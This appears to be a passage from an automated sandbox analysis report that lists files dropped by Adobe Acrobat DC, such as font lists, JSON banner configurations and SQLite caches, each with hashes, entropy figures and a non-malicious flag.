                                                              SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                              Malicious:false
                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):295
                                                              Entropy (8bit):5.365670583512963
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJM3g98kUwPeUkwRe9:YvXKXPWLVT5LjIPBsGMbLUkee9
                                                              MD5:45179BF7DEEF38F04A459285C76362AD
                                                              SHA1:4B4A8AD4B1B61F7CF32443B781FD0D85DD683C8E
                                                              SHA-256:8B6FE282E700DA768573BB65A5E24D1A0545AF8F2BCDD037F237D720405E618A
                                                              SHA-512:D46B2B3358A73837E6895EF9EFFF289996A59C19AD74F6DB4149FDC91957A914F71B14E25205F2BC0D699664268AB22A5DA257DE7A33BD0E128EB3C46FFCF633
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):294
                                                              Entropy (8bit):5.319072244103573
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfBoTfXpnrPeUkwRe9:YvXKXPWLVT5LjIPBsGWTfXcUkee9
                                                              MD5:0EE41C339B705D452B9CF033466BE113
                                                              SHA1:2F32E9095B0627A6343A21C295977D685778D93B
                                                              SHA-256:55113B32BB4A18339DF4A3BEC0C8469181C0A7986C12FE88FE1C1955A9DEDABA
                                                              SHA-512:AE7B25298041E2255CE73B88B68BF7F18BFE64F95D4583BED9ECA056BA38C92CA01DB5CB2B5056CCC2E7D121749DAABD0F1CABFC53BBEC0D2096DCD09971414E
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):294
                                                              Entropy (8bit):5.298067279498649
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfBD2G6UpnrPeUkwRe9:YvXKXPWLVT5LjIPBsGR22cUkee9
                                                              MD5:3F3D6ABD4AD3E8D48CAEA4C3E0301910
                                                              SHA1:895D4E97C798BB632C465C5B19CBDF84CCD8B9AF
                                                              SHA-256:4E5D9A2C1E4F78D9D8107E62F8629A2AF859EF2BC3BB3A65C8ECB1C32AB75D3D
                                                              SHA-512:1E29669C5F3E303DD3E5679ABDE6A7C47F0C351B66FC637A1242C40802B809B7B21871EADE903A7D3872A032B91EAEBA53711BFABACF05D9A3AD91B29240DCD8
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):285
                                                              Entropy (8bit):5.346753570359275
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfPmwrPeUkwRe9:YvXKXPWLVT5LjIPBsGH56Ukee9
                                                              MD5:4ADD297022ACFFE50334132272AA8442
                                                              SHA1:750A30EEA7AC0E261B6DA38D8009CBBBCEF23D94
                                                              SHA-256:58E0F5686607CB09EDDDDD2899ECD81BAE65569848B73DEC9A94CD5847CF1321
                                                              SHA-512:7E2C4C1C47B9EBE2B68EBF6C318B3FF4DA0DCA07B0B9B941537596F50E0BF1D47C2B9F75DB6798858CA1B8870CAACDA2C1420FD3E5309243D7E33FC55108E142
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1123
                                                              Entropy (8bit):5.686761438673648
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XPWRT5XIzpLgE9cQx8LennAvzBvkn0RCmK8czOCCSnK:YvhLXahgy6SAFv5Ah8cv/nK
                                                              MD5:8B25ABBE1E9C3DBCB34D954FA9F0BC55
                                                              SHA1:66E81086B42B3A58E9C4897C77AB53DF13D353EF
                                                              SHA-256:904648EAE0CD03EAB5544B5B18942BEE16F0E4277CB967D76C7653884323A2B3
                                                              SHA-512:D17C84358734E32E8036C5CB41051793B04C1933BAEC1B7C4B1F3EDB062CE2ADD581F4072FB67D3384AD5A2B80D3053AA8158381B7D1E4C4B306643449FEA0F0
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):1122
                                                              Entropy (8bit):5.684896679178683
                                                              Encrypted:false
                                                              SSDEEP:24:Yv6XPWRT5XIvVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBmK:YvhLX8FgSNycJUAh8cvYH1K
                                                              MD5:5D494E234B56EA3CDD5577A988C06421
                                                              SHA1:E42A602524E0E8C1598CF19E96F66B5E3AEE2856
                                                              SHA-256:18F967C925573EE9EBCC1356054F010F704D7D390F2C0DC09DE8B3D4CB458E6D
                                                              SHA-512:FC60CFB376E24B7421FDB245B2C09AA1232AD7EFE04303DD527F1FE635293F83DBAE441719D10BB588D9398678A4D1E6DE8A8B2E9CB8F7A35622E8B85017B782
                                                              Malicious:false
                                                              Preview:{"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):292
                                                              Entropy (8bit):5.3097887248506055
                                                              Encrypted:false
                                                              SSDEEP:6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfQ1rPeUkwRe9:YvXKXPWLVT5LjIPBsGY16Ukee9
                                                              MD5:D362E3B37BF7BCBB34FB34FDFDFF644A
SHA1: 6229D1CCB6D2FE1B94CFCA6688EA606B2805C5A5
SHA-256: E0DEF2E553AFDD70830E0A7C403558EAE4D7786D29275C9F1457C4EC1CAB003B
SHA-512: D16D0E4B6DE7D27EFFD337554ED37DB3FF72936AB699953E058F0E3A4DBF0053683D5AC558679BA396F2CC42DA4953F2EEE02CB97341D78833F5ECB56ED78BC8
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 1102
Entropy (8bit): 5.675496769256343
Encrypted: false
SSDEEP: 24:Yv6XPWRT5XI+2LgErcXWl7y0nAvzIBcSJCBViVmK:YvhLXhogH47yfkB5kVnK
MD5: F286F96F9B74412F4F9401230AA5C748
SHA1: B1F41DDF802A7F98B9960B1EAE3F9947597AA4D7
SHA-256: 0515D95A125A5BDEF8B756E408E4AA152DCDDB35D5A310C133C4B0DF00CA533C
SHA-512: F7B4858169D35D4D9CBE365B407418A3795D580D78BEC95FBE3678CADCF224F6C8F9043A2894CE84E7BB47FC26C26346AF489CE0EB8360B7F077379FD16E5EBD
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 1164
Entropy (8bit): 5.705174449547672
Encrypted: false
SSDEEP: 24:Yv6XPWRT5XIyKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5mK:YvhLXhEgqprtrS5OZjSlwTmAfSKMK
MD5: 384048F40DA2D5DFF646A81BCF9FD8A0
SHA1: 0D9418A53B4C9880F4D3CBE2CE457F6A9AFC18AA
SHA-256: C736FC6F1A0FA026160E134C54CE9C982455F2A580C8EEE84EAB757B5CC84D52
SHA-512: CEF96D3EA3C1D34D683465B7DF3E519928819FA0913A303837212718C52C0E63C00AB3379790D4B8973F78DE189CEB9D4A73583F80AC1EAF741A0B1C258D9135
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 289
Entropy (8bit): 5.32516780305737
Encrypted: false
SSDEEP: 6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfYdPeUkwRe9:YvXKXPWLVT5LjIPBsGg8Ukee9
MD5: 29A09587B07297367109B1DB38E59EF2
SHA1: EA572652448B75CACBFAC24BD3622145E46ECE8B
SHA-256: D438B9128425856F5C771D15958E164FE4E5AD062A8A24098A45A9CA37C8ECB8
SHA-512: 5DB68B660BF2B2C56E7A6390A00D746AA2EDE256CBDB5F350400321B25925C5FF4511BBE707B5ABCEF6946CD5FBDBE89E238451E7842A78805FDC88DB07293D4
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 284
Entropy (8bit): 5.311960261932134
Encrypted: false
SSDEEP: 6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJf+dPeUkwRe9:YvXKXPWLVT5LjIPBsG28Ukee9
MD5: 184D78DAB76C9F0EEF107B4CA88076AF
SHA1: 5A28331919937C1FBC4F19C04FB41A7AA14BD137
SHA-256: 830D08E30600DB91EF74E5CF3AE50A51C98FD6CFB854BE77D64BD288CDF40051
SHA-512: D4DCD505A70083A8DE517573A9ECCF792D0C7F048E3E25A66AD9F065592529DD9646348038FA88047E6122DCCF1997EBAC559C1C7F1E4DEB657F0741D5982AED
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 291
Entropy (8bit): 5.308541926139774
Encrypted: false
SSDEEP: 6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfbPtdPeUkwRe9:YvXKXPWLVT5LjIPBsGDV8Ukee9
MD5: 176EB806F2ECBD8A26892422EF9910BD
SHA1: AB4D70EF2905C28DB1BB866D29C19EA2FABAA749
SHA-256: 3EBD0496D4E4E89AA34967F46BFDFEEB330507D36C73A7DE112C278778B5734C
SHA-512: 63E8CBCF3923DED05BC55335349E62EFE585ED5C59978EDC1362A2513CA22C46AD12887833B471CC75443E9BA57A674020C689E8AAE21ED70B9B1EBD8795A227
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 287
Entropy (8bit): 5.3006502136332925
Encrypted: false
SSDEEP: 6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJf21rPeUkwRe9:YvXKXPWLVT5LjIPBsG+16Ukee9
MD5: 23C408D8808F04EFCEC948FBD4BF3BF7
SHA1: A234ED175F60FC4E0359B891B24C78F213FBCA34
SHA-256: 3FF4A0A83C1CBDCDA5FB75058B0B123B547552448CEE139B19897C39918226C5
SHA-512: 47660F1F6DD6D020293BEF83149E173BAE329ADBB506AD0EE03B20FAF92BA5A272028E995A464ECB1F45A8DE1F2C628D6AC2A0859F569EC103EE7A1B95235551
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 1090
Entropy (8bit): 5.664520863240313
Encrypted: false
SSDEEP: 24:Yv6XPWRT5XIDamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSnK:YvhLXIBgkDMUJUAh8cvMnK
MD5: 73BBD7D492774CC54BB5971BBBEE5F17
SHA1: 00F863189559A51A35BF08D4190E52FF3E496EC0
SHA-256: D1EC59200479A0A7D450A0C1F1BC7C71AC84FB37AD9339A22672E8D987205312
SHA-512: 36000E7496586ECF84E739CAD6A24B30DEF164736A8C197ABD02EAD69917E9E23D6C8844B8851F3248DEFB2AEBB9B6B8282285D82BB7B21A3F6D434F764EF006
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 286
Entropy (8bit): 5.2747901957084595
Encrypted: false
SSDEEP: 6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJfshHHrPeUkwRe9:YvXKXPWLVT5LjIPBsGUUUkee9
MD5: 936FE359C4E330249F28FBF78BE4CA14
SHA1: 585CFBA5C0C30D243D4BAA0CF82A6679BB219909
SHA-256: 4E654192E0D660947E2469B5DAC7F314B57505BF5E49BD0B306A71CC8DFE8E43
SHA-512: 1DAD12536414CF379ADC3BA1DDE8609F9C835C0B40B8C310183CC8221067D8582B705F892074730A17E55C633508F802C7A02E6C677D2C483AF37E794B23E419
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 282
Entropy (8bit): 5.283584295578911
Encrypted: false
SSDEEP: 6:YEQXJ2HXPWqCLvWmSg1c2LjcWkHvR0YntDoAvJTqgFCrPeUkwRe9:YvXKXPWLVT5LjIPBsGTq16Ukee9
MD5: 6219656FBBE83F3666C1A6ADB66B937B
SHA1: 1EDED3606C9B9FE78197EFB6EB382224055E82BC
SHA-256: E2BA2304E927E1635D86E8F16DBF17E1840CC379BB04EEAB1869A9C319C0FC39
SHA-512: 0EB0D7FB086CBC81A4434886158491D0AFDBBCB8A56C140867CDD8E5EE92DBAFE318357823A92DD7A990894D8009297EB64C2D400EA08ED122BAC1B6586EBD3E
Malicious: false
Preview: {"analyticsData":{"responseGUID":"e2c3d99b-546a-463d-84bb-e5438fb31543","sophiaUUID":"8C4093EC-3A2E-41DD-AFC7-28A61CF92EFA"},"encodingScheme":true,"expirationDTS":1733673094104,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: data
Category: dropped
Size (bytes): 4
Entropy (8bit): 0.8112781244591328
Encrypted: false
SSDEEP: 3:e:e
MD5: DC84B0D741E5BEAE8070013ADDCC8C28
SHA1: 802F4A6A20CBF157AAF6C4E07E4301578D5936A2
SHA-256: 81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
SHA-512: 65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
Malicious: false
Preview: ....

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: JSON data
Category: dropped
Size (bytes): 2817
Entropy (8bit): 5.145934248498581
Encrypted: false
SSDEEP: 48:YLn6WTmfDIM2dKd4dEf1/+SOFGE+nFEtYxtDuMpcgZQ9WybX6:8n6WTmfDIM2dk4dEfV+SnEEWctDuMCav
MD5: BDE256376EFE3762ABE98FA49FB629E3
SHA1: 33D68AD3C685C29179352144DC982947BAF0454E
SHA-256: 44DD61E4EC051898592A87DC02625E5BEEC3F147335851E07917C73EC56C9FEE
SHA-512: 5E43C6A768A28A494BCD4E9B19AAAC19178CEA8E2AB1A4F4EB52FB5B88EBCA6EB9BB31B8D2A780CE80829A44B274D487C4275508A2BD4E612C6B4E478DBCD7F6
Malicious: false
Preview: {"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"d412f2a4a95814262a818bcc34e47fda","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1733496409000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"b59759ba3b50e2da5169330546682124","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1733496409000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"671d02553813f9eda6b997f2c159b3fb","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1733496409000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"f41eb3ca4f75642be7b63f1dfb33385c","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1733496408000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"33810e774239bade1f83f8af11cc991c","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1733496408000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"91fc3a753fe2b3a6772ce1b6cc615257","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: SQLite 3.x database, last written using SQLite version 3040000, file counter 26, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 26
Category: dropped
Size (bytes): 12288
Entropy (8bit): 1.3650298386460242
Encrypted: false
SSDEEP: 24:TLBx/XYKQvGJF7urs9S6bqyKn6ylSTofcNqDuEJz0XKdqEKfS8EKfM1ba8Jz0F:Tll2GL7msMcKTlS8fcsuENfI82
MD5: 2C53AA343093475CC479057D3EA766AC
SHA1: 20E9527CE056303CD3593E68DB7F80E6DDB9D5F8
SHA-256: 6D705688F8D9ECAD78DF9230AA27685176BA7C433D110126F0CA5FD86BFA3E13
SHA-512: E1EB7B8850ED7E36AE5B4C020DD5B80F5BC2B29C0BFF1C372B1E3C4DA290A92B517DA89B3368AC1194678529A407AA5B4BD4CFCFBEA05BB41CD6978BAD0D8D1D
Malicious: false
Preview: SQLite format 3......@ ..........................................................................c..... (remainder of the preview is non-printable binary data)

Process: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type: SQLite Rollback Journal
Category: dropped
Size (bytes): 8720
Entropy (8bit): 1.8433417105550125
Encrypted: false
SSDEEP: 24:7+tLwZ6bqyKn6ylSTofcNqDuEJz0+KdqEKfS8EKfM1banbqr+qLKufx/XYKQvGJ8:7ML+cKTlS8fcsuE0fIW+qGufl2GL7msK
MD5: 04FD617F237227846ED5B794C6C7C75A
SHA1: 950D35CECD62552C42D4ADB05B7C942BC07B4C7B
SHA-256: 04D4B782A5C173B9936DD3939AD7D92EFCEFA457F67640DADE7FB0C576556C8D
